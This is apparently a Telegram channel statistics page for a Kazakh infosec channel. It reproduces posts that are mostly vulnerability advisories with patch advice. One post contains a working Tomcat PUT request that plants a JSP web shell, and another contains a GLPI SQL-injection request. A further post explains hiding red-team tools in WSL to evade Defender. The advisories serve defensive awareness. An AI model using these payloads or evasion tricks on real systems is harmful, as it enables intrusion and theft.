Мир сегодня с "Юрий Подоляка"

Труха⚡️Україна

Ko'rish

Николаевский Ванёк

Ko'rish

Мир сегодня с "Юрий Подоляка"

Ko'rish

Труха⚡️Україна

Ko'rish

Николаевский Ванёк

Ko'rish

SecuriXy.kz

Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz
Обратная связь - @feedback_securixy_bot
Хахатушки - @memekatz
Hack the Box RUS - @HTB_RUS

TGlist reytingi

TuriOmmaviy

Tekshirish

Tekshirilmagan

Ishonchnoma

Shubhali

JoylashuvКазахстан

TilBoshqa

Kanal yaratilgan sanaЛист 05, 2024

TGlist-ga qo'shildi

Лист 05, 2024

Men kanal egasiman

O'zgartirishlar tarixi

Telegram kanali SecuriXy.kz statistikasi

Batafsil

Obunachilar

5 548

24 soat

100.2%Hafta

661.2%Oy

1452.7%

Iqtiboslar indeksi

200

Eslatmalar2Kanallardagi repostlar0Kanallardagi eslatmalar2

Bitta postning o'rtacha qamrovi

977

12 soat5470%24 soat9770%48 soat1 3100%

Ishtirok (ER)

5.73%

Repostlar48Izohlar0Reaksiyalar8

Qamrov bo'yicha ishtirok (ERR)

0%

24 soat0%Hafta

0.17%Oy

2.03%

Bitta reklama postining qamrovi

977

1 soat61562.95%1 – 4 soat18418.83%4 - 24 soat33334.08%

Batafsil

Botimizni kanalingizga ulang va ushbu kanal auditoriyasining jinsini bilib oling.

24 soat ichidagi barcha postlar

0

Dinamika

"SecuriXy.kz" guruhidagi so'nggi postlar

Barcha postlar

Repost qilingan:

Сертификат безопасности

19.04.202511:51

⚡️KazInfoSec - подборка личных TG-каналов казахстанского ИБ-комьюнити 💭

https://t.me/addlist/kI9Bkz-4Bs41ZmRi

08.04.202507:23

Часто приходится анализировать объекты, файлы и считать размер, количество строк кода, дату изменения и хеши и все это отдельно.
Сделал быстрый реквест для анализа количества строк кода, размера, дату мзменения и SHA256 всех объектов папки:

Можно добавить альяс в zshrc и одной командой быстро чекать

#tips #forensics #SAST #file_info #securixy

07.04.202511:33

💣 pgAdmin RCE CVE-2025-2945 -
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.

Актуально для всех версий pgAdmin ≤ 9.1

🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.

🎯 Уязвимые endpoints:


/sqleditor/query_tool/download/

/cloud/deploy

📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам

📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.

🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945

https://www.youtube.com/watch?v=V2WzCmRct7s

07.04.202511:23

🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.

💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99

🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).

📦 PoC:


curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
  -H "Content-Type: application/x-jsp" \
  --data-raw '<%@ page import="java.io.*" %>


<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"
"); } } %>
' -i

📥 Доступ к вебшеллу:

📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg

‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.

⛔ Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.

07.04.202508:13

🚨 Снова #GLPI - Критическая уязвимость SQL-инъекции без аутентификации через /index.php/ajax/ CVE-2025-24799 и CVE-2025-24801

Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.

🛠️ Затрагивает версии до 10.0.18
✅ Исправлено в версии GLPI 10.0.18

🔍 PoC:


POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232


    
    get_params
    ', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main

📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html

‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.

07.04.202507:45

#️⃣ Критическая уязвимость в OpenVPN (TLS-crypt-v2) CVE-2025-2704

🧨 Удалённая DoS-атака на OpenVPN-сервер через повреждённые и переиспользованные пакеты в ранней фазе TLS-рукопожатия.

📌 Уязвимы версии:
2.6.1 - 2.6.13 (в режиме сервера с включённым `--tls-crypt-v2`)

⚠️ Атакующий с валидным TLS-ключом или доступом к трафику, может вызвать краш сервера с ASSERT()-ошибкой.

🔧 Рекомендации:
Обновитесь до последней версии
Временно отключите --tls-crypt-v2, если обновление невозможно

💬 👉 https://securityonline.info/cve-2025-2704-critical-bug-in-openvpn-can-trigger-server-crashes/

01.04.202519:01

🛠 Как массово переименовать файлы с искаженными расширениями после утечек.

Многие утечки leak-архивов с Jenkins, S3, облаков содержат *.csv-H, *.docx-H, *.log-H - просто криво выгруженные файлы.

Открыть их невозможно до тех пор, пока не вернуть нормальное расширение.

🎯 Решение для:
🔧 Linux:

🍎 macOS: можем юзать #rename

⚠️ -n — это dry-run (тест без изменений). Убери его, чтобы применить переименование.

#Securixy #leak #инфобез #osint #cli #bash #macos #rename #форензика #аналитика

28.03.202511:44

🔒 WSL - твоя легальная зона невидимости от Defender и не только или «это не баг - это фича»

Интересный факт: если скачать SafetyKatz.exe или любой другой red team тул в обычную папку на Windows - Defender тут же бьёт тревогу. Но если ты кинешь тот же .exe или .dll в подсистему WSL (например, Ubuntu или Kali) — тупо тишина.

Почему так?
➡️ Потому что Defender не сканирует WSL-директории в реальном времени.
Ни ~/, ни \\wsl$\\ - вообще никак. Даже если внутри лежит жирный mimikatz.exe с сигнатурами из учебника по форензике.

➡️ Более того, Defender не отслеживает процессы, запущенные в WSL, пока они не пересекают границу в мир Windows (/mnt/c/... и т.п.).
Ты можешь исполнять скрипты, хранить бинари, анализировать malware - и никто не пикнет.

🧠 Вся логика защиты Windows построена вокруг NTFS и PE-файлов. А WSL - это отдельная FS (в случае WSL2 - ext4 в VHDX). То есть фактически: белое пятно на карте защиты.

🎯 Как это можно использовать:
• безопасная зона для анализа вредоносов;
• скрытое хранилище тулзов red team’а;
• C2-операции, использующие WSL как staging point.

💬 Кто шарит - уже юзает. Кто не шарит - пусть знает.

#pentest #redteam #wsl #windowsdefender #securixy

28.03.202511:08

Немного правдивого юмора для настроения

https://t.me/memekatz/163

18.03.202515:15

➡️ #CVE-2025-24071 - уязвимость спуфинга в Проводнике Windows (File Explorer).

📂 Позволяет злоумышленникам подменять отображение файлов и папок в Проводнике, маскируя вредоносные объекты под безопасные. Это может привести к запуску вирусов, краже данных или успешным фишинговым атакам.

🛡️ Microsoft уже выпустила исправление в мартовском Patch Tuesday 2025 года, так что обновляйте Windows’ы!

💬 По слухам, эта уязвимость продавалась в даркнете до выхода патча.

📖 Блог-пост с подробностями:
👉 https://cti.monster/blog/2025/03/18/CVE-2025-24071.html

💣 PoC:
👉 https://github.com/0x6rss/CVE-2025-24071_PoC

18.03.202514:59

Кто-то (HH) начитался про сбор данных от гугла и фейсбуков и решил пойти дальше сканируя людей и их окружение и активы.

https://qna.habr.com/q/465498

https://x.com/nightlind/status/911806158230495232

Вот скрипт:
https://jsfiddle.net/Lknb3xez/

Снимается WebGL fingerprint.
Проверяются доступные шрифты, плагины браузера.

Снимается:
1 Часовой пояс
2 Локализация (язык)
3 Характеристики видеокарты и CPU
4 Параметры экрана, доступность WebRTC

5 Пробует подключиться к localhost на разных портах:


127.0.0.1:22 (SSH)
127.0.0.1:5900 (VNC)
127.0.0.1:3389 (RDP)
127.0.0.1:80, 5000, 8080

и др.

Скрипт не всегда активен:
Определяет тип устройства, локацию, поведение пользователя (например, неактивен в режиме инкогнито или под VPN).
Внедряется по вероятности или под определённые сценарии.

Совет один - Не открывайте доступ браузеру никуда…

17.03.202513:20

Часто бывает такое, что безопасникам или пентестерам приходится за разработчиками собирать инфу по интернету тк точно известно что «нерадивые» оставляют опасные вещи внутри контейнеров или коде.

Написал скрипт #DockerHub-Scanner
который ищет по названию в #DockerHub репозитории с образами, разбирает их и ищет уязвимости и токены, секреты и тп и формирует удобный вывод в json и результирующую в csv.

PS Наваял на скорую руку, со временем буду дорабатывать

https://github.com/cleverg0d/DockerHub-Scanner

17.03.202507:07

Наконец появился анализатор конфигурации Cisco IOS для поиска мисконфигов настроек и уязвимостей #Nihilist от Caster

https://github.com/casterbyte/Nihilist

06.03.202515:37

Еще один SOC инструмент сдырявился следом за вазухом

🚨 Критическая уязвимость в #Kibana : ESA-2025-06 - В версиях от 8.15.0 до 8.17.2 обнаружена уязвимость, позволяющая выполнить произвольный код через Prototype Pollution. Эта уязвимость (CVE-2025-25012) имеет высокий уровень опасности с оценкой CVSS 9.9.

Кто подвержен риску?
В версиях 8.15.0–8.17.0: пользователи с ролью Viewer.
В версиях 8.17.1 и 8.17.2: пользователи с ролями, включающими привилегии fleet-all, integrations-all и actions:execute-advanced-connectors.

Рекомендуемые действия:
Обновитесь до версии Kibana 8.17.3.
Если обновление невозможно, добавьте в конфигурацию Kibana параметр:


xpack.integration_assistant.enabled: false

Repost qilingan:

Волосатый бублик

05.03.202513:48

https://www.rapid7.com/blog/post/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/

Эксплойт уже в продаже (просят 150000$), обновляйтесь!

Barcha postlar

Hech narsa topilmadi 😢

Batafsil

Rekordlar

21.04.202523:59

5.5KObunachilar

19.04.202523:59

500Iqtiboslar indeksi

24.02.202515:25

3.2KBitta post qamrovi

24.02.202515:25

3.2KReklama posti qamrovi

03.03.202509:14

8.50%ER

24.02.202515:26

61.59%ERR

Rivojlanish

Batafsil

Obunachilar

Iqtibos indeksi

1 ta post qamrovi

Reklama posti qamrovi

ERR

Batafsil

SecuriXy.kz mashhur postlari

Barcha postlar

07.04.202511:33


/sqleditor/query_tool/download/

/cloud/deploy

28.03.202511:44

07.04.202511:23


curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
  -H "Content-Type: application/x-jsp" \
  --data-raw '<%@ page import="java.io.*" %>


<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"
"); } } %>
' -i

📥 Доступ к вебшеллу:

07.04.202508:13


POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232


    
    get_params
    ', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

07.04.202507:45

08.04.202507:23

Можно добавить альяс в zshrc и одной командой быстро чекать

#tips #forensics #SAST #file_info #securixy

Repost qilingan:

Сертификат безопасности

19.04.202511:51

⚡️KazInfoSec - подборка личных TG-каналов казахстанского ИБ-комьюнити 💭

https://t.me/addlist/kI9Bkz-4Bs41ZmRi

01.04.202519:01

🍎 macOS: можем юзать #rename

28.03.202511:08

Немного правдивого юмора для настроения

https://t.me/memekatz/163

Ko'proq funksiyalarni ochish uchun tizimga kiring.